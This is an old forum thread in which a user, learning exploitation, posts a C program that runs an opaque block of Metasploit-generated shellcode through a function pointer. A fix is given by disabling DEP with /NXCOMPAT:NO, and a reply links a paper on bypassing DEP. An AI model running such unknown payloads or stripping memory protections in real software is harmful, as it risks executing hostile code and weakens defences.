.

Testing shellcode in C/C++

<<

zeroflaw

User avatar

Full Member
Full Member

Posts: 208

Joined: Fri Feb 12, 2010 10:41 am

Location: Holland, Den Helder

Post Mon Feb 15, 2010 8:56 am

Testing shellcode in C/C++

Instead of using shellcode from generators etc, I decided to learn how to write shellcode myself. So the first step would be writing something that can test the shellcode before I attempt to use it in exploits.

I googled around a bit and found a few C/C++ examples of how to do it. It makes use of a function pointer that points to the shellcode buffer. Well I keep getting an exception about some access violation. I don't really like to ask questions, because maybe I should google around some more and find out on my own. I'm not sure if there's something wrong with the shellcode because I don't know how to write it yet.

Heres my code, I compiled it with Microsoft Visual C++ 2008.

  Code:
#include <stdio.h>

// The x86 shellcode to run. Generated with Metasploit.
char shellCode[] =
"\xbf\x83\xaf\xc1\xb7\xdb\xca\xd9\x74\x24\xf4\x31\xc9\xb1\x32"
"\x58\x31\x78\x12\x03\x78\x12\x83\x6b\x53\x23\x42\x97\x44\x2d"
"\xad\x67\x95\x4e\x27\x82\xa4\x5c\x53\xc7\x95\x50\x17\x85\x15"
"\x1a\x75\x3d\xad\x6e\x52\x32\x06\xc4\x84\x7d\x97\xe8\x08\xd1"
"\x5b\x6a\xf5\x2b\x88\x4c\xc4\xe4\xdd\x8d\x01\x18\x2d\xdf\xda"
"\x57\x9c\xf0\x6f\x25\x1d\xf0\xbf\x22\x1d\x8a\xba\xf4\xea\x20"
"\xc4\x24\x42\x3e\x8e\xdc\xe8\x18\x2f\xdd\x3d\x7b\x13\x94\x4a"
"\x48\xe7\x27\x9b\x80\x08\x16\xe3\x4f\x37\x97\xee\x8e\x7f\x1f"
"\x11\xe5\x8b\x5c\xac\xfe\x4f\x1f\x6a\x8a\x4d\x87\xf9\x2c\xb6"
"\x36\x2d\xaa\x3d\x34\x9a\xb8\x1a\x58\x1d\x6c\x11\x64\x96\x93"
"\xf6\xed\xec\xb7\xd2\xb6\xb7\xd6\x43\x12\x19\xe6\x94\xfa\xc6"
"\x42\xde\xe8\x13\xf4\xbd\x66\xe5\x74\xb8\xcf\xe5\x86\xc3\x7f"
"\x8e\xb7\x48\x10\xc9\x47\x9b\x55\x25\x02\x86\xff\xae\xcb\x52"
"\x42\xb3\xeb\x88\x80\xca\x6f\x39\x78\x29\x6f\x48\x7d\x75\x37"
"\xa0\x0f\xe6\xd2\xc6\xbc\x07\xf7\xa4\x23\x94\x9b\x2a";

int  main()   
{
   void (*shell)(); // Function pointer.
        shell = (void(*)()) (&shellCode);

   printf("Shellcode at: %p\n", shellCode);
   printf("Function pointer points to: %p\n", shell);   

   // Run it!
        printf("Running shellcode...\n");
   shell();

        return 0;
}



And I'm getting this from the assembly. I see it fails after the call to the shellcode.

  Code:
                       // Run it!
                       shell();
                       008813FC 8B F4            mov         esi,esp
                       008813FE FF 55 F8         call        dword ptr [shell]
breaks here --> 00881401 3B F4            cmp         esi,esp
                       00881403 E8 33 FD FF FF   call        @ILT+310(__RTC_CheckEsp) (88113Bh)



I hope you guys can help me! Or at least point me in the right direction. Thanks in advance.

ZF
Last edited by zeroflaw on Mon Feb 15, 2010 10:23 am, edited 1 time in total.
ZF
<<

zeroflaw

User avatar

Full Member
Full Member

Posts: 208

Joined: Fri Feb 12, 2010 10:41 am

Location: Holland, Den Helder

Post Mon Feb 15, 2010 10:08 am

Re: Testing shellcode in C/C++

Nevermind guys, I found the solution. Apparently the "Data Execution Prevention" or DEP kicked in, preventing code to run from the non-executable memory regions.

Compiling with "/NXCOMPAT:NO" prevents this from happening. Now I can finally test my shellcode  :P

Btw, does anyone know how to bypass this? Will DEP render all buffer overflow exploits useless?

ZF
ZF
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Mon Feb 15, 2010 11:50 am

Re: Testing shellcode in C/C++

I had a nice paper on bypassing DEP, but I can't find it anywhere.  I did find this one:

http://www.milw0rm.com/papers/161
~~~~~~~~~~~~~~
Ketchup

Return to Programming

Who is online

Users browsing this forum: No registered users and 0 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software